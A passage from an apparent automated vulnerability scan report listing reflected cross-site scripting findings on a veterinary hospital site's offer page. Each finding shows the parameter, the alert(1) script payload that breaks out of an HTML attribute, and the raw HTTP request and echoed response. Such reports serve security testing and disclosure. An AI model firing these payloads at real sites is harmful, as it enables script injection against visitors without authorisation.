.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:16:04 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=imqt3ohs1kmrs8q3jmpiu4dts2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19802 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=130708440067b79"><script>alert(1)</script>b01a5b3d5be &email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2...[SNIP]...
2.59. http://www.vcahospitals.com/main/offer/ [email parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d48e0"><script>alert(1)</script>069a700961f was submitted in the email parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?addr=&city=&date=1307084400&email=d48e0"><script>alert(1)</script>069a700961f &fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww
.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:16:11 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=1do3gpr45inrh2l3itveglepn0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19845 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=d48e0"><script>alert(1)</script>069a700961f &fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2...[SNIP]...
2.60. http://www.vcahospitals.com/main/offer/ [fname parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the fname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c53f7"><script>alert(1)</script>b1eee91948e was submitted in the fname parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?addr=&city=&date=1307084400&email=&fname=c53f7"><script>alert(1)</script>b1eee91948e &formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww
.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:16:17 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=0rnbm532tpcf38n3r359evpem3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19845 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=c53f7"><script>alert(1)</script>b1eee91948e &formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%...[SNIP]...
2.61. http://www.vcahospitals.com/main/offer/ [formtype parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the formtype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b3af"><script>alert(1)</script>0e53c8134ea was submitted in the formtype parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP5b3af"><script>alert(1)</script>0e53c8134ea &guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww
.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:16:21 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=793suj2hh05lka8bp2u1fr5153; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19802 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP5b3af"><script>alert(1)</script>0e53c8134ea &guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%2...[SNIP]...
2.62. http://www.vcahospitals.com/main/offer/ [guid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the guid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6319b"><script>alert(1)</script>4f2f2352eeb was submitted in the guid parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC776319b"><script>alert(1)</script>4f2f2352eeb &referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F HTTP/1.1 Referer: http://www.vcahospitals.com/main/offer/thank-you.html? User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.vcahospitals.com Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:16:10 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 14706 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FL&optin=1&guid=EB9CB843-C06F-419A-A604-9D3CF6F5CC776319b"><script>alert(1)</script>4f2f2352eeb &referer=http%3A%2F%2Fwww.vcahospitals.com%2Fmain%2Foffer%2Fthank-you.html%3F" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.63. http://www.vcahospitals.com/main/offer/ [ipaddress parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the ipaddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5e17"><script>alert(1)</script>9ed82f767a0 was submitted in the ipaddress parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243d5e17"><script>alert(1)</script>9ed82f767a0 &lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww
.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:16:35 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=ogu2vsddhd2jlpm5p5r0vhodr5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19802 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... <form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243d5e17"><script>alert(1)</script>9ed82f767a0 &lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP...[SNIP]...
2.64. http://www.vcahospitals.com/main/offer/ [lname parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The value of the lname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5910"><script>alert(1)</script>83c5d7c83ea was submitted in the lname parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=e5910"><script>alert(1)</script>83c5d7c83ea &newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww
.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
